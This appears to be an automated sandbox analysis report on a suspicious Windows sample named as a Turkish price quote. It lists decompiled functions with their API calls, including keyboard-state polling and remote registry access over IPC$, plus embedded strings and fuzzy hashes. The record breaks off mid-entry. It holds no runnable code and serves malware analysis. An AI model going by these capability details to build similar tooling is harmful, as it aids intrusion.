GetSysColor.USER32(0000000F), ref: 00999862

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 568aedb42fd55e67d02bcc3c8abb1a81a81f19fcd36d7ac1b5b70943f8e7ce73
Instruction ID: d8d1cb61fc482593b7fa11613809798e24e5af32cec93454e98f0e1e6c16a6c1
Opcode Fuzzy Hash: 568aedb42fd55e67d02bcc3c8abb1a81a81f19fcd36d7ac1b5b70943f8e7ce73
Instruction Fuzzy Hash: 9641A231184644AFDF209F7D9C84BB97BA9EB06331F14861DF9A2872E1E7319C42DB11

Uniqueness

Uniqueness Score: -1.00%

Function 009E96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,009CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 009E9717
LoadStringW.USER32(00000000,?,009CF7F8,00000001), ref: 009E9720

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,009CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 009E9742
LoadStringW.USER32(00000000,?,009CF7F8,00000001), ref: 009E9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 009E9866

Strings

^ ERROR, xrefs: 009E97FB
Line %d:, xrefs: 009E97A0
%s (%d) : ==> %s: %s %s, xrefs: 009E984A
Error: , xrefs: 009E981D
Line %d (File "%s"):, xrefs: 009E978F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: e83e947701c053a1d6a02ab7f0ac245fcbc213cef0bf39edccd8d5e9996dc979
Instruction ID: b877b8417d437cba88526e2232883d1efcbcc70a7341fb3742da76f933e25d4f
Opcode Fuzzy Hash: e83e947701c053a1d6a02ab7f0ac245fcbc213cef0bf39edccd8d5e9996dc979
Instruction Fuzzy Hash: 61414A72800219AACF05FBE0DE86FEEB378AF95740F544425F60672192EB356F49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009E06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009E07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009E07BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009E07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009E0804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 009E082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009E0837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009E083C

Strings

\IPC$, xrefs: 009E0784
SOFTWARE\Classes\, xrefs: 009E070E
\CLSID, xrefs: 009E0724

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: ce0dbdef4aefe04e71b1925b7021613f8559c0586b249f485c5cc90c90d919ff
Instruction ID: 2289581e63af4284ae35537f5a53853afa039205c943463dc52f29400e720fbe
Opcode Fuzzy Hash: ce0dbdef4aefe04e71b1925b7021613f8559c0586b249f485c5cc90c90d919ff
Instruction Fuzzy Hash: 2E411672C10229ABDF15EBA4DC85DEDB778FF84750B04812AE901A3261EB759E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A03C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A03C5C
CoInitialize.OLE32(00000000), ref: 00A03C8A
CoUninitialize.OLE32 ref: 00A03C94
_wcslen.LIBCMT ref: 00A03D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00A03DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00A03ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A03F0E
CoGetObject.OLE32(?,00000000,00A1FB98,?), ref: 00A03F2D
SetErrorMode.KERNEL32(00000000), ref: 00A03F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A03FC4
VariantClear.OLEAUT32(?), ref: 00A03FD8

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: b788cc6dc9bc3fb79aa8e92a3c7793ed0a4c23b7b77457bd3e4468a942e756c3
Instruction ID: c17aae0b99b0c5e701a5d56b200bb1a82bd93c5648605c5969027ceb93b688af
Opcode Fuzzy Hash: b788cc6dc9bc3fb79aa8e92a3c7793ed0a4c23b7b77457bd3e4468a942e756c3
Instruction Fuzzy Hash: 04C15772608309AFDB00DF68D88492BB7E9FF89744F04491DF98A9B291D730ED05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009F7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009F7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009F7B8F
SHGetDesktopFolder.SHELL32(?), ref: 009F7BA3
CoCreateInstance.OLE32(00A1FD08,00000000,00000001,00A46E6C,?), ref: 009F7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009F7C74
CoTaskMemFree.OLE32(?,?), ref: 009F7CCC
SHBrowseForFolderW.SHELL32(?), ref: 009F7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009F7D7A
CoTaskMemFree.OLE32(00000000), ref: 009F7D81
CoTaskMemFree.OLE32(00000000), ref: 009F7DD6
CoUninitialize.OLE32 ref: 009F7DDC

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: e174c0e05325215e03fe5b553ccd3193d90827672ffe6afe9c182444e3857665
Instruction ID: 390d12ba7295807c54e6ff43e2258a7a548e0dc3e61cb15c5d30c25783892004
Opcode Fuzzy Hash: e174c0e05325215e03fe5b553ccd3193d90827672ffe6afe9c182444e3857665
Instruction Fuzzy Hash: B7C11A75A04109AFCB14DFA4C888DAEBBF9FF48314B148499F9199B361D731EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A1541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A15504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A15515
CharNextW.USER32(00000158), ref: 00A15544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A15585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A1559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A155AC

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 46ee4fc730b3a3bb779feda293caa44433a1b429c75ff4b0b4b78541cfc35ae6
Instruction ID: fddbe86be4a564d83cfad50fad892a660e80813514180fe1e9b1f0bede1754cc
Opcode Fuzzy Hash: 46ee4fc730b3a3bb779feda293caa44433a1b429c75ff4b0b4b78541cfc35ae6
Instruction Fuzzy Hash: FC616E35D00608EFDF10DFA4CC84AFE7BBAEB89721F108145F525A6291D7748AC1DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009DFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009DFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 009DFB08
VariantInit.OLEAUT32(?), ref: 009DFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 009DFB3A
VariantCopy.OLEAUT32(?,?), ref: 009DFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 009DFBA1
VariantClear.OLEAUT32(?), ref: 009DFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 009DFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009DFBCC
VariantClear.OLEAUT32(?), ref: 009DFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009DFBE9

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 1173c39d38197ec49e25e693f7b84974861fe9d3d8230a79a542ff8eeca6c150
Instruction ID: 540fcdd8f7b0ee8c31a69b6a4fe30a1eb97c559035c064be39bdc9285df35abd
Opcode Fuzzy Hash: 1173c39d38197ec49e25e693f7b84974861fe9d3d8230a79a542ff8eeca6c150
Instruction Fuzzy Hash: 92418234A402199FCB00DFA4D8699EDBBB9EF48354F00C06AE946A7361D734A946CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009E9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 009E9CA1
GetAsyncKeyState.USER32(000000A0), ref: 009E9D22
GetKeyState.USER32(000000A0), ref: 009E9D3D
GetAsyncKeyState.USER32(000000A1), ref: 009E9D57
GetKeyState.USER32(000000A1), ref: 009E9D6C
GetAsyncKeyState.USER32(00000011), ref: 009E9D84
GetKeyState.USER32(00000011), ref: 009E9D96
GetAsyncKeyState.USER32(00000012), ref: 009E9DAE
GetKeyState.USER32(00000012), ref: 009E9DC0
GetAsyncKeyState.USER32(0000005B), ref: 009E9DD8
GetKeyState.USER32(0000005B), ref: 009E9DEA

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: b13ca49ce3e08dd3eae63caf0cfd25443ce94bf71743c04508f3749c72982679
Instruction ID: c68b190ea5fcb9eb45a6b8218c152d89eff3dc8db348edf9e5e8e3bd646d95d6
Opcode Fuzzy Hash: b13ca49ce3e08dd3eae63caf0cfd25443ce94bf71743c04508f3749c72982679
Instruction Fuzzy Hash: EB41F8345047D96DFF3297A288043F5BEE96F12354F08805EDAC65A5C2DBA49DC8C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A0055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A005BC
inet_addr.WSOCK32(?), ref: 00A0061C
gethostbyname.WSOCK32(?), ref: 00A00628
IcmpCreateFile.IPHLPAPI ref: 00A00636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A006C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A006E5
IcmpCloseHandle.IPHLPAPI(?), ref: 00A007B9
WSACleanup.WSOCK32 ref: 00A007BF

Strings

Ping, xrefs: 00A00676

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 0017451228adc38e4c581babbc84f678299162a1d4071f6b2aebad59e1036567
Instruction ID: 5e9dc7fcf59806ff07438a112f1f6f509ca498df5c1fc3b529be1be2b915101c
Opcode Fuzzy Hash: 0017451228adc38e4c581babbc84f678299162a1d4071f6b2aebad59e1036567
Instruction Fuzzy Hash: B591CF34608601AFD720DF15E888F1ABBE0AF89318F1485A9F4698B7A2C775FD45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A08CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00A08CF3

Part of subcall function 009E8E54: _wcslen.LIBCMT ref: 009E8E77

_wcslen.LIBCMT ref: 00A08D4E
_wcslen.LIBCMT ref: 00A08D9C
_wcslen.LIBCMT ref: 00A08DDC
_wcslen.LIBCMT ref: 00A08E6E

Strings

stdcall, xrefs: 00A08DD6, 00A08DDB
cdecl, xrefs: 00A08D48, 00A08D4D
none, xrefs: 00A08E65, 00A08E6A
winapi, xrefs: 00A08D96, 00A08D9B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 152c03bdc409207acf6958af47773b0fea71b8fedafacfdc43f92e59362b10e8
Instruction ID: 2c887a9f4359ae9c4d08156323146892a3a4234ed70ad14d89e826a76e1695f5
Opcode Fuzzy Hash: 152c03bdc409207acf6958af47773b0fea71b8fedafacfdc43f92e59362b10e8
Instruction Fuzzy Hash: 2751C131A0051A9BCF14DF68D9409BEB7A6BFA5720B214229E8A6E73C4DB38DD40C794

Uniqueness

Uniqueness Score: -1.00%

Function 00A0372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00A03774
CoUninitialize.OLE32 ref: 00A0377F
CoCreateInstance.OLE32(?,00000000,00000017,00A1FB78,?), ref: 00A037D9
IIDFromString.OLE32(?,?), ref: 00A0384C
VariantInit.OLEAUT32(?), ref: 00A038E4
VariantClear.OLEAUT32(?), ref: 00A03936

Strings

NULL Pointer assignment, xrefs: 00A0381E
Invalid parameter, xrefs: 00A03865
Failed to create object, xrefs: 00A037E4, 00A0389A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: ef199dddfbb56027239c4580e093202a6d111832f955653f19cd7453fb4ff9b0
Instruction ID: ed8cfc3e1234fdf1d8b802208e8b42d7c63c21ad448d82c23ed4abc4b147e309
Opcode Fuzzy Hash: ef199dddfbb56027239c4580e093202a6d111832f955653f19cd7453fb4ff9b0
Instruction Fuzzy Hash: 1761CF72608305AFDB11DF54D888F6ABBE8FF88710F104849F9859B291D770EE48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009F3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009F33CF

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009F33F0

Strings

Incorrect parameters to object property !, xrefs: 009F34AB
"%s" (%d) : ==> %s:, xrefs: 009F3522
^ ERROR , xrefs: 009F349E
"%s" (%d) : ==> %s:%s%s, xrefs: 009F3504
Error: , xrefs: 009F34D1
Line %d (File "%s"):, xrefs: 009F3443, 009F345C

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: f9f2279c75ce2c217a6d604a827ff0f440d4f6b28f52fa80fafc3226ea275aa6
Instruction ID: 9bb19e9ed142933a1e9474634171a07db2a39b520d3b2279cd86eaf359d83233
Opcode Fuzzy Hash: f9f2279c75ce2c217a6d604a827ff0f440d4f6b28f52fa80fafc3226ea275aa6
Instruction Fuzzy Hash: 76518A3190020ABADF15EBE0CD56FFEB378AF94340F248465F109721A2EB252F59CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009EB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009EB5FC
_wcslen.LIBCMT ref: 009EB608
_wcslen.LIBCMT ref: 009EB64D
_wcslen.LIBCMT ref: 009EB68C
_wcslen.LIBCMT ref: 009EB6C7

Strings

KEYS, xrefs: 009EB647, 009EB64C
REMOVE, xrefs: 009EB602, 009EB607
APPEND, xrefs: 009EB6C1, 009EB6C6
EXISTS, xrefs: 009EB686, 009EB68B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 862d882d4c1fd897d2ad7dd969194d5a1402dfbb436d95d66577657a6ed14b0c
Instruction ID: 3a4ab3a6adb5e2f3e12b99c5cf7fe06ab766c1d8a93a3b13d5ee66bc636452ad
Opcode Fuzzy Hash: 862d882d4c1fd897d2ad7dd969194d5a1402dfbb436d95d66577657a6ed14b0c
Instruction Fuzzy Hash: E841E732A000679ACB216F7E88905BFB7A9BBE1F74B244529E521DB284E735CD81C790

Uniqueness

Uniqueness Score: -1.00%

Function 009F5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009F53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009F5416
GetLastError.KERNEL32 ref: 009F5420
SetErrorMode.KERNEL32(00000000,READY), ref: 009F54A7

Strings

READONLY, xrefs: 009F5452
UNKNOWN, xrefs: 009F5444
READY, xrefs: 009F5460, 009F5468
NOTREADY, xrefs: 009F544B
INVALID, xrefs: 009F5459

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: e953a4c82f35a80aaf4b2f5bfdeacec05f96876ea107936482bd7dde76c2cd3c
Instruction ID: a54458714496d86bc422171cad3241f279cfef3ccdcb4248c23ecf283fff4f5b
Opcode Fuzzy Hash: e953a4c82f35a80aaf4b2f5bfdeacec05f96876ea107936482bd7dde76c2cd3c
Instruction Fuzzy Hash: DC31B075A006099FC710DF68C484BFABBB8EF45309F198069E605CB3A2D731DD82CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A13C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00A13C79
SetMenu.USER32(?,00000000), ref: 00A13C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A13D10
IsMenu.USER32(?), ref: 00A13D24
CreatePopupMenu.USER32 ref: 00A13D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A13D5B
DrawMenuBar.USER32 ref: 00A13D63

Strings

F, xrefs: 00A13D4E
0, xrefs: 00A13C54

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
